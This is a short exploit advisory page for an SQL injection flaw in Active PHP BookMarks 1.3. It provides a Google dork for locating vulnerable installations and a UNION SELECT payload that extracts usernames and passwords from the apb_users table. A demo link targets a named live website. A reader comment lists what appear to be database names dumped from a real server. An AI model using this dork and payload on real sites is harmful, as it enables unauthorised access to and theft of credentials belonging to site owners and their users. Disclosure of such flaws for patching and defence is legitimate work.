Active PHP BookMarks 1.3 - Sql Injection Vulnerability

2022.01.05
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

********************************************************* #Exploit Title: Active PHP BookMarks 1.3 - Sql Injection Vulnerability #Date: 2021-01-05 #Exploit Author: Behrouz Mansoori #Google Dork: "Powered by Active PHP Bookmarks v1.3" inurl:.view_group.php?id= #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Powered by Active PHP Bookmarks v1.3" inurl:.view_group.php?id= ex : http://[Target.com]/path/view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users-- ### Demo : https://blog.strav.net/apb/view_group.php?id=-98%20UNION%20SELECT%201,2,version(),4,5,6,7,8-- ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: mr.mansoori@yahoo.com *********************************************************


Vote for this issue:
50%
50%

Comment it here.
Porn | Date: 2022-01-06 10:33 CET+1
[*] ampache [*] apb [*] auto_manuals [*] b2evolution [*] BASILIX [*] bid_monkey [*] bluecherry [*] bookworm [*] bugzilla [*] database [*] dspam [*] fitness [*] information_schema [*] intranet [*] krypto [*] music [*] mysql [*] notes [*] npm [*] nuke [*] performance_schema [*] phpchain [*] phpchain1 [*] phpchain2 [*] phpmyadmin [*] phpwebsite [*] pimppa [*] property [*] recipedb [*] roundcubemail [*] test [*] tokenz [*] up [*] webcalendar [*] webthings [*] xsdb [*] zm [*] ZM_DB_NAME

Copyright 2025, cxsecurity.com

 

Back to Top